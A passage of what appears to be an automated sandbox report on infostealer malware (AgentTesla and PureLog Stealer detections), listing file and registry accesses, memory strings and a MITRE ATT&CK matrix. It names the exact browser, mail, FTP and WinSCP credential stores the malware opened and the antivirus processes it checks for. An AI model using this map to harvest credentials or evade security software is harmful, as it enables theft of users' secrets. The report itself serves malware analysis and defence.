                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                      Source: C:\Windows\System32\AppVClient.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Users\Public\Libraries\aymtmquJ.pifQueries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\Public\Libraries\aymtmquJ.pifQueries volume information: C:\ VolumeInformation
                      Source: C:\Users\Public\alpha.exeCode function: 9_2_00007FF706EC9584 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,GetTickCount,QueryPerformanceCounter,9_2_00007FF706EC9584
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B370F4 LookupAccountNameW,GetLastError,GetLastError,LocalAlloc,LocalAlloc,LookupAccountNameW,GetLastError,ConvertSidToStringSidW,GetLastError,#357,LocalFree,LocalFree,LocalFree,12_2_00007FF627B370F4
                      Source: C:\Users\Public\alpha.exeCode function: 9_2_00007FF706EB586C GetVersion,9_2_00007FF706EB586C
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                      Source: AnyDesk.PIF, 0000000F.00000003.1396114152.000000007DBA0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1397101171.000000007EDB0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1396114152.000000007DCC6000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1557125328.000000007EF26000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: cmdagent.exe
                      Source: AnyDesk.PIF, 0000000F.00000003.1396114152.000000007DBA0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1397101171.000000007EDB0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1396114152.000000007DCC6000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1557125328.000000007EF26000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: quhlpsvc.exe
                      Source: AnyDesk.PIF, 0000000F.00000003.1396114152.000000007DBA0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1397101171.000000007EDB0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1396114152.000000007DCC6000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1557125328.000000007EF26000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: avgamsvr.exe
                      Source: AnyDesk.PIF, 0000000F.00000003.1396114152.000000007DBA0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1397101171.000000007EDB0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1396114152.000000007DCC6000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1557125328.000000007EF26000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: TMBMSRV.exe
                      Source: AnyDesk.PIF, 0000000F.00000003.1396114152.000000007DBA0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1397101171.000000007EDB0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1396114152.000000007DCC6000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1557125328.000000007EF26000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: Vsserv.exe
                      Source: AnyDesk.PIF, 0000000F.00000003.1396114152.000000007DBA0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1397101171.000000007EDB0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1396114152.000000007DCC6000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1557125328.000000007EF26000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: avgupsvc.exe
                      Source: AnyDesk.PIF, 0000000F.00000003.1396114152.000000007DBA0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1397101171.000000007EDB0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1396114152.000000007DCC6000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1557125328.000000007EF26000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: avgemc.exe
                      Source: AnyDesk.PIF, 0000000F.00000003.1396114152.000000007DBA0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1397101171.000000007EDB0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000003.1396114152.000000007DCC6000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000F.00000002.1557125328.000000007EF26000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: MsMpEng.exe

                      Stealing of Sensitive Information

                      barindex
                      Yara detected AgentTesla
                      Source: Yara matchFile source: 27.2.Native_neworigin.exe.2fe0000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000001B.00000002.1722177417.000000000305A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002B.00000002.1784000004.0000000002E20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001B.00000002.1722177417.0000000003001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Native_neworigin.exe PID: 7256, type: MEMORYSTR
                      Yara detected PureLog Stealer
                      Source: Yara matchFile source: 27.2.Native_neworigin.exe.52d0f08.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 43.2.Native_neworigin.exe.2a6711e.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 43.2.Native_neworigin.exe.5700000.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 27.2.Native_neworigin.exe.5360000.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 27.2.Native_neworigin.exe.2b66216.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 43.2.Native_neworigin.exe.4f70000.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 43.2.Native_neworigin.exe.3d45570.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 27.2.Native_neworigin.exe.52d0f08.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 43.2.Native_neworigin.exe.3d46478.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 43.2.Native_neworigin.exe.3d45570.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 43.2.Native_neworigin.exe.2a66216.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 43.2.Native_neworigin.exe.4f70f08.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 43.2.Native_neworigin.exe.3d9c190.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 43.2.Native_neworigin.exe.3d46478.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 27.2.Native_neworigin.exe.405c190.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 27.2.Native_neworigin.exe.405c190.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 27.2.Native_neworigin.exe.2b6711e.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 27.2.Native_neworigin.exe.52d0000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 43.2.Native_neworigin.exe.4f70000.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 27.3.Native_neworigin.exe.65a488.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 43.2.Native_neworigin.exe.2a66216.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 27.2.Native_neworigin.exe.2b6711e.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 43.2.Native_neworigin.exe.5700000.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 27.3.Native_neworigin.exe.65a488.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 43.2.Native_neworigin.exe.2a6711e.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 27.2.Native_neworigin.exe.5360000.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 27.2.Native_neworigin.exe.52d0000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 27.2.Native_neworigin.exe.2b66216.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 43.2.Native_neworigin.exe.4f70f08.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 43.2.Native_neworigin.exe.3d9c190.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000002B.00000003.1635956799.0000000000705000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002B.00000002.1772725476.0000000002A26000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001B.00000002.1782700008.0000000005360000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001B.00000002.1714513945.0000000002B26000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001B.00000003.1443226587.000000000065A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002B.00000002.1814740153.0000000005700000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001B.00000002.1781352411.00000000052D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001B.00000002.1767484584.000000000401D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002B.00000002.1807691329.0000000003D45000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002B.00000002.1810974592.0000000004F70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                      Tries to harvest and steal browser information (history, passwords, etc)
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\cookies.sqlite
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                      Tries to harvest and steal ftp login credentials
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeFile opened: C:\FTP Navigator\Ftplist.txt
                      Tries to steal Mail credentials (via file / registry access)
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                      Source: Yara matchFile source: 27.2.Native_neworigin.exe.2fe0000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000002B.00000002.1784000004.0000000002E20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001B.00000002.1722177417.0000000003001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Native_neworigin.exe PID: 7256, type: MEMORYSTR

                      Remote Access Functionality

                      barindex
                      Yara detected AgentTesla
                      Source: Yara matchFile source: 27.2.Native_neworigin.exe.2fe0000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000001B.00000002.1722177417.000000000305A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002B.00000002.1784000004.0000000002E20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001B.00000002.1722177417.0000000003001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Native_neworigin.exe PID: 7256, type: MEMORYSTR
                      Yara detected PureLog Stealer
                      Source: Yara matchFile source: 27.2.Native_neworigin.exe.52d0f08.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 43.2.Native_neworigin.exe.2a6711e.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 43.2.Native_neworigin.exe.5700000.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 27.2.Native_neworigin.exe.5360000.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 27.2.Native_neworigin.exe.2b66216.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 43.2.Native_neworigin.exe.4f70000.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 43.2.Native_neworigin.exe.3d45570.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 27.2.Native_neworigin.exe.52d0f08.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 43.2.Native_neworigin.exe.3d46478.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 43.2.Native_neworigin.exe.3d45570.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 43.2.Native_neworigin.exe.2a66216.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 43.2.Native_neworigin.exe.4f70f08.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 43.2.Native_neworigin.exe.3d9c190.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 43.2.Native_neworigin.exe.3d46478.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 27.2.Native_neworigin.exe.405c190.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 27.2.Native_neworigin.exe.405c190.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 27.2.Native_neworigin.exe.2b6711e.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 27.2.Native_neworigin.exe.52d0000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 43.2.Native_neworigin.exe.4f70000.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 27.3.Native_neworigin.exe.65a488.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 43.2.Native_neworigin.exe.2a66216.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 27.2.Native_neworigin.exe.2b6711e.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 43.2.Native_neworigin.exe.5700000.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 27.3.Native_neworigin.exe.65a488.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 43.2.Native_neworigin.exe.2a6711e.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 27.2.Native_neworigin.exe.5360000.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 27.2.Native_neworigin.exe.52d0000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 27.2.Native_neworigin.exe.2b66216.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 43.2.Native_neworigin.exe.4f70f08.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 43.2.Native_neworigin.exe.3d9c190.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000002B.00000003.1635956799.0000000000705000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002B.00000002.1772725476.0000000002A26000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001B.00000002.1782700008.0000000005360000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001B.00000002.1714513945.0000000002B26000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001B.00000003.1443226587.000000000065A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002B.00000002.1814740153.0000000005700000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001B.00000002.1781352411.00000000052D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001B.00000002.1767484584.000000000401D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002B.00000002.1807691329.0000000003D45000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002B.00000002.1810974592.0000000004F70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A7E568 #357,LookupAccountSidW,GetLastError,#357,DsGetDcNameW,DsBindW,DsGetDomainControllerInfoW,DsGetDomainControllerInfoW,#357,DsUnBindW,NetApiBufferFree,LocalFree,12_2_00007FF627A7E568
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A6227C DsGetDcNameW,#357,DsBindW,DsCrackNamesW,#357,#357,#357,#357,#357,LocalAlloc,#359,DsUnBindW,NetApiBufferFree,DsFreeNameResultW,LocalFree,LocalFree,12_2_00007FF627A6227C
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A85648 #357,#357,DsGetSiteNameW,#359,LocalAlloc,LocalAlloc,GetTickCount,DsGetSiteNameW,GetTickCount,#207,LocalFree,#359,NetApiBufferFree,#357,#357,#207,LocalFree,#359,#359,#359,LocalFree,NetApiBufferFree,NetApiBufferFree,LocalFree,LocalFree,#357,DsUnBindW,12_2_00007FF627A85648
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A654A0 wcschr,NetApiBufferFree,DsFreeNameResultW,#13,LocalFree,DsGetDcNameW,#359,#224,#224,DsBindW,#357,DsCrackNamesW,#357,#145,#359,#359,#14,#359,#73,#359,#208,#26,#127,LocalFree,#140,#359,#224,#167,#27,#357,#357,#41,NetApiBufferFree,DsUnBindW,DsFreeNameResultW,#13,LocalFree,12_2_00007FF627A654A0

                      Mitre Att&ck Matrix

                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire Infrastructure2
                      Valid Accounts                      		121
                      Windows Management Instrumentation                      		1
                      LSASS Driver                      		1
                      LSASS Driver                      		31
                      Disable or Modify Tools                      		2
                      OS Credential Dumping                      		1
                      System Time Discovery                      		1
                      Taint Shared Content                      		12
                      Archive Collected Data                      		3
                      Ingress Tool Transfer                      		Exfiltration Over Other Network Medium1
                      Data Encrypted for Impact
                      CredentialsDomainsDefault Accounts1
                      Native API                      		1
                      DLL Side-Loading                      		1
                      DLL Side-Loading                      		11
                      Deobfuscate/Decode Files or Information                      		211
                      Input Capture                      		1
                      Account Discovery                      		Remote Desktop Protocol2
                      Data from Local System                      		21
                      Encrypted Channel                      		Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain Accounts1
                      Shared Modules                      		2
                      Valid Accounts                      		2
                      Valid Accounts                      		3
                      Obfuscated Files or Information                      		1
                      Credentials in Registry                      		1
                      System Network Connections Discovery                      		SMB/Windows Admin Shares1
                      Email Collection                      		1
                      Non-Standard Port                      		Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal Accounts1
                      Scheduled Task/Job                      		1
                      Scheduled Task/Job                      		21
                      Access Token Manipulation                      		1
                      Install Root Certificate                      		NTDS3
                      File and Directory Discovery                      		Distributed Component Object Model211
                      Input Capture                      		4
                      Non-Application Layer Protocol                      		Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchd21
                      Registry Run Keys / Startup Folder                      		311
                      Process Injection                      		11
                      Software Packing                      		LSA Secrets48
                      System Information Discovery                      		SSH1
                      Clipboard Data                      		125
                      Application Layer Protocol                      		Scheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts1
                      Scheduled Task/Job                      		1
                      Timestomp                      		Cached Domain Credentials1
                      Query Registry                      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items21
                      Registry Run Keys / Startup Folder                      		1
                      DLL Side-Loading                      		DCSync251
                      Security Software Discovery                      		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job431
                      Masquerading                      		Proc Filesystem1
                      Process Discovery                      		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt2
                      Valid Accounts                      		/etc/passwd and /etc/shadow151
                      Virtualization/Sandbox Evasion                      		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                      IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron151
                      Virtualization/Sandbox Evasion                      		Network Sniffing1
                      Application Window Discovery                      		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                      Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd21
                      Access Token Manipulation                      		Input Capture1
                      System Owner/User Discovery                      		Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                      Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task311
                      Process Injection                      		Keylogging1
                      System Network Configuration Discovery                      		Taint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
